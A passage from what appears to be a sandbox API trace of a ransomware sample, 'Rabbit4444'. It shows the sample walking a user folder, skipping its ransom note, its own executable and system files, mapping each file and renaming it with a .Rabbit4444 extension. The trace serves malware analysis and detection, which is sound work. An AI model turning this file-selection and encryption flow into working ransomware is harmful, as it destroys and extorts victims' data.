dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0068.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0068.419] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15972940638) returned 1 [0068.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0068.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0068.419] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.419] CloseHandle (hObject=0x29c) returned 1 [0068.419] CloseHandle (hObject=0x280) returned 1 [0068.419] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}.Rabbit4444") returned 156 [0068.419] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ceb91a43-1cee-4eee-98b6-9a4c011b37fa}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ceb91a43-1cee-4eee-98b6-9a4c011b37fa}.rabbit4444"), dwFlags=0x1) returned 1 [0068.420] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c67e0c0, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c67e0c0, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x453492ab, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", cAlternateFileName="{CF026~1")) returned 1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="Rabbit4444.exe") returned -1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2=".") returned 1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="..") returned 1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="windows") returned -1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="bootmgr") returned -1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="pagefile.sys") returned -1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="boot") returned -1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="ids.txt") returned -1 [0068.420] lstrcmpiW (lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", lpString2="NTUSER.DAT") returned -1 [0068.420] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}" | out: lpString1="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}") returned="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}" [0068.420] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}", dwFileAttributes=0x0) returned 1 [0068.421] lstrlenW (lpString="{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}") returned 38 [0068.421] lstrlenW (lpString="Rabbit4444") returned 10 [0068.421] lstrcmpiW (lpString1="40E61A8B9}", lpString2="Rabbit4444") returned -1 [0068.421] lstrlenW (lpString=".dll") returned 4 [0068.421] lstrcmpiW (lpString1="8B9}", lpString2=".dll") returned 1 [0068.421] lstrlenW (lpString=".lnk") returned 4 [0068.421] lstrcmpiW (lpString1="8B9}", lpString2=".lnk") returned 1 [0068.421] lstrlenW (lpString=".ini") returned 4 [0068.421] lstrcmpiW (lpString1="8B9}", lpString2=".ini") returned 1 [0068.421] lstrlenW (lpString=".sys") returned 4 [0068.421] lstrcmpiW (lpString1="8B9}", lpString2=".sys") returned 1 [0068.421] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cf026799-e48e-4c9c-a4c5-90f40e61a8b9}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.421] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.421] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15973200379) returned 1 [0068.421] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0068.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.421] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.423] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.424] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15973512412) returned 1 [0068.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0068.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.424] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.425] CloseHandle (hObject=0x29c) returned 1 [0068.425] CloseHandle (hObject=0x280) returned 1 [0068.425] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}.Rabbit4444") returned 156 [0068.425] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cf026799-e48e-4c9c-a4c5-90f40e61a8b9}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CF026799-E48E-4C9C-A4C5-90F40E61A8B9}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cf026799-e48e-4c9c-a4c5-90f40e61a8b9}.rabbit4444"), dwFlags=0x1) returned 1 [0068.425] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c6ca578, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c6ca578, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x453492ab, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", cAlternateFileName="{D1B85~1")) returned 1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="Rabbit4444.exe") returned -1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2=".") returned 1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="..") returned 1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="windows") returned -1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="bootmgr") returned -1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="pagefile.sys") returned -1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="boot") returned -1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="ids.txt") returned -1 [0068.426] lstrcmpiW (lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", lpString2="NTUSER.DAT") returned -1 [0068.426] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}" | out: lpString1="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}") returned="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}" [0068.426] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}", dwFileAttributes=0x0) returned 1 [0068.426] lstrlenW (lpString="{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}") returned 38 [0068.426] lstrlenW (lpString="Rabbit4444") returned 10 [0068.426] lstrcmpiW (lpString1="53F5CF8F6}", lpString2="Rabbit4444") returned -1 [0068.426] lstrlenW (lpString=".dll") returned 4 [0068.426] lstrcmpiW (lpString1="8F6}", lpString2=".dll") returned 1 [0068.426] lstrlenW (lpString=".lnk") returned 4 [0068.426] lstrcmpiW (lpString1="8F6}", lpString2=".lnk") returned 1 [0068.426] lstrlenW (lpString=".ini") returned 4 [0068.426] lstrcmpiW (lpString1="8F6}", lpString2=".ini") returned 1 [0068.426] lstrlenW (lpString=".sys") returned 4 [0068.426] lstrcmpiW (lpString1="8F6}", lpString2=".sys") returned 1 [0068.426] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d1b85b9a-7da9-4bfb-81ae-9fa53f5cf8f6}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.427] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.427] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15973755419) returned 1 [0068.427] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.427] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.427] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0068.427] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.431] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.433] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15974385986) returned 1 [0068.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0068.433] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.433] CloseHandle (hObject=0x29c) returned 1 [0068.433] CloseHandle (hObject=0x280) returned 1 [0068.433] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}.Rabbit4444") returned 156 [0068.434] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d1b85b9a-7da9-4bfb-81ae-9fa53f5cf8f6}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D1B85B9A-7DA9-4BFB-81AE-9FA53F5CF8F6}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d1b85b9a-7da9-4bfb-81ae-9fa53f5cf8f6}.rabbit4444"), dwFlags=0x1) returned 1 [0068.434] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0fa9a0, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c0fa9a0, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", cAlternateFileName="{D2653~1")) returned 1 [0068.434] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.434] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.434] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="Rabbit4444.exe") returned -1 [0068.434] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2=".") returned 1 [0068.434] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="..") returned 1 [0068.434] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="windows") returned -1 [0068.434] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="bootmgr") returned -1 [0068.434] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="pagefile.sys") returned -1 [0068.435] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="boot") returned -1 [0068.435] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="ids.txt") returned -1 [0068.435] lstrcmpiW (lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", lpString2="NTUSER.DAT") returned -1 [0068.435] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}" | out: lpString1="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}") returned="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}" [0068.435] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D2653F73-A5FA-4D15-B21C-E630C96E25AA}", dwFileAttributes=0x0) returned 1 [0068.435] lstrlenW (lpString="{D2653F73-A5FA-4D15-B21C-E630C96E25AA}") returned 38 [0068.435] lstrlenW (lpString="Rabbit4444") returned 10 [0068.435] lstrcmpiW (lpString1="0C96E25AA}", lpString2="Rabbit4444") returned -1 [0068.435] lstrlenW (lpString=".dll") returned 4 [0068.435] lstrcmpiW (lpString1="5AA}", lpString2=".dll") returned 1 [0068.435] lstrlenW (lpString=".lnk") returned 4 [0068.435] lstrcmpiW (lpString1="5AA}", lpString2=".lnk") returned 1 [0068.435] lstrlenW (lpString=".ini") returned 4 [0068.435] lstrcmpiW (lpString1="5AA}", lpString2=".ini") returned 1 [0068.435] lstrlenW (lpString=".sys") returned 4 [0068.435] lstrcmpiW (lpString1="5AA}", lpString2=".sys") returned 1 [0068.435] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D2653F73-A5FA-4D15-B21C-E630C96E25AA}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d2653f73-a5fa-4d15-b21c-e630c96e25aa}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.436] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.436] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15974635223) returned 1 [0068.436] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0068.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0068.436] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.437] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.438] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15974895080) returned 1 [0068.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0068.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0068.438] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.438] CloseHandle (hObject=0x29c) returned 1 [0068.438] CloseHandle (hObject=0x280) returned 1 [0068.439] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D2653F73-A5FA-4D15-B21C-E630C96E25AA}.Rabbit4444") returned 156 [0068.439] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D2653F73-A5FA-4D15-B21C-E630C96E25AA}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d2653f73-a5fa-4d15-b21c-e630c96e25aa}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D2653F73-A5FA-4D15-B21C-E630C96E25AA}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d2653f73-a5fa-4d15-b21c-e630c96e25aa}.rabbit4444"), dwFlags=0x1) returned 1 [0068.439] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x163fa478, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x163fa478, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", cAlternateFileName="{D750F~1")) returned 1 [0068.439] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.439] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.439] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="Rabbit4444.exe") returned -1 [0068.440] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2=".") returned 1 [0068.440] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="..") returned 1 [0068.440] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="windows") returned -1 [0068.440] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="bootmgr") returned -1 [0068.440] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="pagefile.sys") returned -1 [0068.440] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="boot") returned -1 [0068.440] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="ids.txt") returned -1 [0068.440] lstrcmpiW (lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", lpString2="NTUSER.DAT") returned -1 [0068.440] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}" | out: lpString1="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}") returned="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}" [0068.440] SetFileAttributesW 